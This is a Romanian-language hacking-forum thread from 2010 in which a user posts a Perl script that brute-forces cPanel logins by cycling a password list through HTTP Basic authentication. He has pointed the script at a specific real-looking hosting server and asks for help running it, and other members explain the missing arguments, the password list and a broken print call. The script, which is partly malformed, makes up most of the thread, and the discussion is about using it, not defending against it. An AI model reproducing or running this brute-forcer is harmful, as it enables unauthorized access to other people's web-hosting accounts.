Boyka Posted August 31, 2010 Report Posted August 31, 2010 Am gasit un exploit pentru Cpanel pe care l-am modificat.#!/usr/bin/perl# Cpanel Password Brute Forcer# ----------------------------# (c)oded By Macedonian Security Crew# Perl Version ( low speed )# Oerginal Advisory # use IO::Socket;use LWP::Simple;use MIME::Base64;$host = $ARGV[0];$user = $ARGV[1];$port = $ARGV[2];$list = $ARGV[3];$file = $ARGV[4];$url = "https://".server2.whmpanels.com.":".$2083;if(@ARGV < 3){print q();exit;}headx();$numstart = "-1";sub headx() {print q();open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";@PASSWORDS = <PASSFILE>;close PASSFILE;foreach my $P (@PASSWORDS) {chomp $P;$passwd = $P;print " [~] Try Password : $passwd";&brut;};}sub brut() {$authx = encode_base64($user.":".$passwd);print $authx;my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print " [-] Can not connect to the host";print $sock "GET / HTTP/1.1";print $sock "Authorization: Basic $authx";print $sock "Connection: Close";read $sock, $answer, 128;close($sock);if ($answer =~ /Moved/) {print " [~] PASSWORD FOUND : $passwd";exit();}}I-am dat numele cpanelexploit.plIn PERL execut asa $ cpanelexploit.plDupa ce execut nu se intampla nimic. Unde gresesc?Mentionez ca habar nu am perl si ca nici macar nu stiu daca asa se foloseste exploitul.Astept cu multa rabdare ajutor si sugestii. Quote
Nytro Posted August 31, 2010 Report Posted August 31, 2010 Foarte probabil exploitul nu mai e functional. Oricum, iti trebuie o lista cu parole, si asta face bruteforce. Ai dat 5 argumente in linia de comanda? Si ce anume ai modificat? 1 Quote
wpanda Posted August 31, 2010 Report Posted August 31, 2010 (edited) va ca apelezi o functie print q() vezi ca functia e nulla pune ceva in ea print q("Mai trebuie argumente\n");ai sters din cod prea multL.E daca nu ai habar de perl de ce ai mai modificat scriptul? Edited August 31, 2010 by wpanda Quote
Boyka Posted August 31, 2010 Author Report Posted August 31, 2010 (edited) Corect, lista de parole^^ (n00b). De modificat n-am modificat decat url-ul dar trebuie mai intai sa invat perl.LE: S-a rezolvat. Imi cer scuze pentru deranj pentru ca in primul rand nu am citit cu atentie scriptul. Acum il voi modifica mai cu atentie si sper sa mearga. Edited September 1, 2010 by Boyka Quote
